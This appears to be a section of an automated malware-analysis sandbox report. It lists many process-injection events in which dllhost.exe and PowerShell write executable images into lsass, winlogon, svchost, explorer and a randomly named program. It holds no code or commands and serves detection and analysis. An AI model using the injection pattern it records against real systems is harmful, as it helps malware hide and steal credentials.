Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2512A6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1BEB0A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253DFF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 3140000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5752
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5016
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 412
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 945657010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 253C67D0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: E0FCD97010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAEE30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B8D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C95C650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24AE77D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209A4BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FB7A020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 143A2940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 16BA4E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 19C72DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000
